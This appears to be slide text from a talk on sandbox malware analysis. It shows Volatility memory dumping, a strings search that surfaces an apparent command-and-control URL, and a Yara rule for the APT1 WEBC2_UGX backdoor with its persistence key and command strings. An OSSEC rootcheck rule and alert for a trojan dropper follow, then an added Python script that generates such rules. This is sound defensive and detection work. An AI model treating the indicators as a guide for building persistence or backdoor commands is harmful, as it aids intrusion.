    santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ vol.py memdump --profile=Win7SP1x86 -f memory.dmp -D ./ -p 3080
    Volatility Foundation Volatility Framework 2.4
    ************************************************************************
    Writing AcroRD32.exe [  3080] to 3080.dmp

    santiago@cuckoo:~$ strings 3080.dmp | grep -i garyhart
    www.garyhart.com
    w.garyhart.com
    w.garyhart.com
    w.garyhart.com
    www.garyhart.com
    st: www.garyhart.com
    w.garyhart.com
    tp://www.garyhart.com/nfuse.htm
    tp://www.garyhart.com/nfuse.htm
    tp://www.garyhart.com/nfuse.htm
    tp://www.garyhart.com/nfuse.htm
    tp://www.garyhart.com/nfuse.htm
    tp://www.garyhart.com/nfuse.htm
    www.garyhart.com
    http://www.garyhart.com/nfuse.htm

  • 26. Memory Analysis - Yara
    santiago@cuckoo:~/Cuckoo/cuckoo/storage/analyses/34$ yara /home/santiago/viper/data/yara/apt1.yara 3080.dmp
    APT1_WEBC2_UGX 3080.dmp

    rule APT1_WEBC2_UGX
    {
        meta:
            author = "AlienVault Labs"
            info = "CommentCrew-threat-apt1"
        strings:
            $persis = "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN" wide ascii
            $exe = "DefWatch.exe" wide ascii
            $html = "index1.html" wide ascii
            $cmd1 = "!@#tiuq#@!" wide ascii
            $cmd2 = "!@#dmc#@!" wide ascii
            $cmd3 = "!@#troppusnu#@!" wide ascii
        condition:
            3 of them
    }

  • 27. OSSEC - Rootcheck
    Used for rootkits and malware detection. It can be used to:
    • Look for suspicious files.
    • Inspect files and registry keys for common rootkits/malware entries.
    • Look for hidden processes and network ports.

  • 28. OSSEC – Rule for Trojan Dropper
    [Trojan Dropper] [all] [0A37D49E798F50C8F1010D5CFDE0E851]
    f:C:\Users\IEUser\AppData\Local\Temp\AcroRD32.exe;
    r:HKEY_USERS\S-1-5-21-3463664321-2923530833-3546627382-1000\Software\Microsoft\Windows\CurrentVersion\Run -> Acroread -> r:AcroRD32.exe;
    p:r:AcroRD32.exe;

    /var/ossec/etc/shared/win_malware_rcl.txt

  • 29. OSSEC – Alert for Trojan Dropper
    alienvault:/var/ossec/bin# ./rootcheck_control -L -i 001
    Policy and auditing events for agent 'Windows7 (001) - 172.16.126.134':
    Resolved events:
    ** No entries found.
    Last scan: 2014 Sep 12 18:54:24
    Windows Audit: Null sessions allowed.
    Windows Malware: Trojan Dropper. File: C:\Users\IEUser\AppData\Local\Temp\AcroRD32.exe. Reference: 0A37D49E798F50C8F1010D5CFDE0E851 .

  • 30. Demo – Alert for Trojan Dropper

  • 31. Future Work
    • Use/create Cuckoo signatures to identify different malware patterns (droppers, downloaders, trojans, rootkits, …)
    • Create Cuckoo reporting module to report (JSON) on those patterns that OSSEC can detect.
    • Python tool to parse module output and generate rootcheck rules.
    • Add/improve OSSEC malware detection capabilities.
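The rootcheck rule on slide 28 and the "Python tool to parse module output and generate rootcheck rules" item above, as one added example that is not code from the deck, OSSEC or Cuckoo: it builds a win_malware_rcl.txt entry from a constructed Cuckoo-style JSON summary (the field names are assumptions, not Cuckoo's real schema; the indicator values mirror slide 28) and parses the resulting rootcheck_control line from slide 29.

```python
"""Generate an OSSEC rootcheck entry from a Cuckoo-style behavioural summary
and parse the alert it produces.

Added example (not the deck's, OSSEC's or Cuckoo's code). The report
fields below are assumed, not Cuckoo's real schema; values mirror slide 28.
"""
import json
import re

# Constructed sample report (field names assumed). The executable, Run-key
# value and process are the ones slide 28 keys its rule on; the ~tmp file is
# added here to show why per-run scratch files must not become indicators.
SAMPLE_REPORT = r"""
{
  "md5": "0A37D49E798F50C8F1010D5CFDE0E851",
  "name": "Trojan Dropper",
  "files_written": [
    "C:\\Users\\IEUser\\AppData\\Local\\Temp\\AcroRD32.exe",
    "C:\\Users\\IEUser\\AppData\\Local\\Temp\\~tmp4f2a.tmp"
  ],
  "registry_set": [
    {
      "key": "HKEY_USERS\\S-1-5-21-3463664321-2923530833-3546627382-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
      "value": "Acroread",
      "data": "C:\\Users\\IEUser\\AppData\\Local\\Temp\\AcroRD32.exe"
    }
  ],
  "processes": ["AcroRD32.exe"]
}
"""

# Constructed rootcheck_control line in the shape shown on slide 29.
SAMPLE_ALERT = (
    "Windows Malware: Trojan Dropper. File: "
    "C:\\Users\\IEUser\\AppData\\Local\\Temp\\AcroRD32.exe. "
    "Reference: 0A37D49E798F50C8F1010D5CFDE0E851 ."
)

SCRATCH_FILE = re.compile(r"\.tmp$", re.IGNORECASE)
ALERT_RE = re.compile(
    r"^Windows Malware: (?P<name>.+?)\. File: (?P<file>.+?)\. "
    r"Reference: (?P<ref>\S+)\s*\.?$"
)


def persistent_files(paths):
    """Drop scratch files: a ~xxxx.tmp name changes on every run, so a rule
    keyed on it would silently never fire on an infected host."""
    return [p for p in paths if not SCRATCH_FILE.search(p)]


def basename(path):
    return path.rsplit("\\", 1)[-1]


def build_rcl_entry(report_json, condition="all"):
    """Return one rootcheck entry: header line, then f:/r:/p: checks.

    [all] requires every check to match before the alert fires, as on
    slide 28; [any] is the other condition rootcheck accepts."""
    if condition not in ("all", "any"):
        raise ValueError("rootcheck condition must be 'all' or 'any'")
    report = json.loads(report_json)
    lines = [f"[{report['name']}] [{condition}] [{report['md5']}]"]
    for path in persistent_files(report["files_written"]):
        lines.append(f"f:{path};")
    for reg in report["registry_set"]:
        # Match only the executable name in the value data, as slide 28 does,
        # so the check still holds if the dropper picks another directory.
        # The name is emitted verbatim: rootcheck uses OSSEC's own regex
        # dialect, not PCRE, so re.escape() would produce the wrong syntax.
        lines.append(f"r:{reg['key']} -> {reg['value']} -> r:{basename(reg['data'])};")
    for proc in report["processes"]:
        lines.append(f"p:r:{proc};")
    return "\n".join(lines) + "\n"


def parse_rootcheck_alert(line):
    """Split a 'Windows Malware:' line from rootcheck_control -L into rule
    name, offending file and reference (the sample's MD5); None otherwise."""
    m = ALERT_RE.match(line.strip())
    return None if m is None else m.groupdict()


def alert_matches_rule(alert, report_json):
    """Tie an alert back to the rule that produced it via the reference."""
    report = json.loads(report_json)
    return (alert is not None and alert["ref"] == report["md5"]
            and alert["name"] == report["name"])


if __name__ == "__main__":
    print(build_rcl_entry(SAMPLE_REPORT))
    print(parse_rootcheck_alert(SAMPLE_ALERT))
```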